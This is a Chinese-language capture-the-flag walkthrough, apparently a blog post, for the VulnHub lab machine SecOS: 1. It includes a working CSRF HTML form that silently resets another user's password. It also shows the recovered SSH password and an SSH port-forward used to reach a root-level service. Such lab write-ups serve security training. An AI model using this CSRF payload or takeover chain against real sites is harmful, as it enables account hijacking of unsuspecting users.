oscp——SecOS: 1

0x00 目标资料 38

链接

https://www.vulnhub.com/entry/secos-1,88/

难度推荐 3

  • 思路 1
  • web——usershell 1
  • usershell——rootshell 1

环境搭建

  • VMbox

0x01 信息收集

IP

在这里插入图片描述

端口

在这里插入图片描述

0x02 Web——Usershell

拿到之后,访问一下8081端口
在这里插入图片描述
然后看到一个注册的界面,进行用户的注册,我这里注册的内容是 cs/123456
在这里插入图片描述
在about页面找到了一行注释的内容
在这里插入图片描述
访问这个页面之后发现提示说是要使用csrf
在这里插入图片描述
功能处有修改密码的地方,这里写一个csrf的payload

<html>
<body>
<form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
<input type="hidden" name="username" value="spiderman">
<input type="hidden" name="password" value="123456">
</form>
<script type="text/javascript">
document.changepass.submit();
</script>
</body>
</html>

然后python 开一个8000,这里选择python是因为可以看到访问记录。

sendmessage发送一下
在这里插入图片描述
等待一段时间,这里可以不着急,干一会儿其他事情,这里可以看到已经成功的被访问了。
在这里插入图片描述

登录下spiderman的账号,在message中看到一个密码

CrazyPassword!

在这里插入图片描述

这里尝试使用ssh进行连接,如下图,连接成功
在这里插入图片描述

0x03 Usershell——Rootshell

其实可以尝试的就是 suid,sudo -l,ps ,netstat,内核,各种配置文件

这里在端口看到,本地开启了一个9000,如下图

在这里插入图片描述
进行一个端口转发

ssh -L 4444:127.0.0.1:9000 spiderman@192.168.124.23

在这里插入图片描述
访问一下http://127.0.0.1:4444
在这里插入图片描述
查看一下权限是root

在这里插入图片描述
这里可以弹shell,也可以不弹,直接找到flag

在这里插入图片描述

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页